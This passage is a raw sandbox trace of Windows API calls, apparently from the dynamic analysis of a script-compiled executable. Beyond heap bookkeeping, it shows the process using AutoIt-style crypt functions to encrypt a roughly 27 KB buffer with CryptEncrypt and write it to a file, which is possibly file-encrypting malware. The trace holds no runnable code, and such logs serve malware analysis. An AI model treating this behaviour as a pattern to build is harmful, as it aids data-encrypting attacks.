lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0076.775] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0076.775] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00f8 | out: hHeap=0x1780000) returned 1 [0076.775] CryptGetKeyParam (in: hKey=0x41ac000, dwParam=0x7, pbData=0x43e2710, pdwDataLen=0x144e260, dwFlags=0x0 | out: pbData=0x43e2710*=0x6610, pdwDataLen=0x144e260*=0x4) returned 1 [0076.775] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0076.775] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0076.775] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0076.775] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0076.775] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0076.775] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0076.776] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0076.776] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0076.776] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0076.776] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0076.776] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0076.776] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0076.776] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0076.776] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0076.776] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0076.776] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0076.776] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0076.776] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0076.776] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0076.776] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0076.776] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0076.776] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0076.776] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0076.776] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0058 | out: hHeap=0x1780000) returned 1 [0076.776] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0076.776] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0076.776] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0076.776] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0076.776] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0076.776] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0076.776] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0076.776] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0076.776] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0076.777] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0076.777] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0076.777] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0076.777] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0076.777] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0076.777] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0076.777] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0076.777] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0076.777] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2728 | out: hHeap=0x1780000) returned 1 [0076.777] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0076.777] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0076.777] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0076.777] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0076.777] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0076.777] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0076.777] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0076.777] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0076.777] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90f8 | out: hHeap=0x1780000) returned 1 [0076.777] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0076.777] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0076.777] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0076.777] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9a40 | out: hHeap=0x1780000) returned 1 [0076.777] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0076.777] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0076.777] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0076.777] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0076.777] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9a40 | out: hHeap=0x1780000) returned 1 [0076.777] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0076.778] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0076.778] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0076.778] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0076.778] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0076.778] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0076.778] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0076.778] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0076.778] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0076.778] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f48 | out: hHeap=0x1780000) returned 1 [0076.778] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0076.778] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0076.778] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0076.778] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0076.778] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0076.778] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0076.778] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2b48 | out: hHeap=0x1780000) returned 1 [0076.778] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fe8 | out: hHeap=0x1780000) returned 1 [0076.778] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0076.778] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0076.778] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d01e8 | out: hHeap=0x1780000) returned 1 [0076.778] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0076.778] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac6c0 | out: hHeap=0x1780000) returned 1 [0076.778] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9338 | out: hHeap=0x1780000) returned 1 [0076.778] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0076.778] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0076.778] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0076.778] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0076.778] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0076.779] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2b18 | out: hHeap=0x1780000) returned 1 [0076.779] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0076.779] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0076.779] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0076.779] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0076.779] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797008 | out: hHeap=0x1780000) returned 1 [0076.779] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0076.779] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0076.779] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0076.779] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0076.779] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0076.779] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0076.779] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43ca958, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0076.779] CryptEncrypt (in: hKey=0x41ac000, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x144e790*=0x6cbd, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x144e790*=0x6cc0) returned 1 [0076.779] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2800 [0076.779] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e9e90 [0076.780] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe50 [0076.780] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0076.780] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0076.780] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0076.780] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2780 [0076.780] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0076.780] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0076.780] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0076.780] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2770 [0076.780] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0076.780] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0076.780] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7f0 [0076.780] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2730 [0076.780] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0076.780] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0076.782] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9b8 [0076.782] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28e0 [0076.782] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0076.782] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7f0 [0076.782] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0076.782] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27b0 [0076.782] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0076.782] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0076.782] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0076.782] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2860 [0076.782] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0076.782] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0076.782] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0076.782] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2900 [0076.782] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0076.782] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0076.782] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0076.782] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27d0 [0076.782] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0076.782] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2770 [0076.782] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43eada8 [0076.782] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2890 [0076.783] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2750 [0076.783] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27c0 [0076.783] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797108 [0076.783] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2780 [0076.783] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac6c0 [0076.783] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0076.783] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28a0 [0076.783] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2840 [0076.783] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2830 [0076.783] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff18 [0076.783] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa18 [0076.783] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27e0 [0076.783] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa30 [0076.783] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2790 [0076.783] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0076.783] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2810 [0076.783] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797028 [0076.783] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0076.783] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0076.783] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27a0 [0076.783] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27c0 [0076.783] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffe0 [0076.783] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9b8 [0076.784] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796fc8 [0076.784] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2790 [0076.784] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d01e8 [0076.784] CharLowerBuffW (in: lpsz="byte[27841]", cchLength=0xb | out: lpsz="byte[27841]") returned 0xb [0076.784] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2848 [0076.784] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0076.784] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2850 [0076.784] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0076.784] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27d0 [0076.784] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0076.784] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2800 [0076.784] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0076.784] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2860 [0076.784] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2770 [0076.784] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x6cc1) returned 0x49046a0 [0076.784] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796ec8 [0076.784] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2ae8 [0076.784] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0076.784] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28d0 [0076.784] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfdd8 [0076.784] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0076.784] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2730 [0076.784] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1797108 [0076.784] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2668 [0076.784] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa78 [0076.784] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2850 [0076.785] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0076.785] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28c0 [0076.785] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0076.785] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27d0 [0076.785] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28b0 [0076.785] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x6cbd) returned 0x490b370 [0076.785] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2890 [0076.785] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x6cbd) returned 0x4912038 [0076.785] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0076.785] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0076.785] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac70 [0076.785] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2890 [0076.785] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2840 [0076.785] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabb0 [0076.785] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0076.785] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xd) returned 0x43cab68 [0076.785] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43cab68, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0076.785] CryptEncrypt (in: hKey=0x41ac000, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x49046a0*, pdwDataLen=0x144e790*=0x6cbd, dwBufLen=0x6cc0 | out: pbData=0x49046a0*, pdwDataLen=0x144e790*=0x6cc0) returned 1 [0076.786] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2870 [0076.786] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43ea2e0 [0076.786] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd60 [0076.786] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacd0 [0076.786] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac70 [0076.786] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacb8 [0076.786] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2830 [0076.786] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0076.786] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0076.786] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0076.786] WriteFile (in: hFile=0x298, lpBuffer=0x4926698*, nNumberOfBytesToWrite=0x6cc0, lpNumberOfBytesWritten=0x144f194, lpOverlapped=0x0 | out: lpBuffer=0x4926698*, lpNumberOfBytesWritten=0x144f194*=0x6cc0, lpOverlapped=0x0) returned 1 [0076.788] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0076.788] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0076.788] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0076.788] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0076.788] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27d0 [0076.788] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28f0 [0076.788] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0076.788] 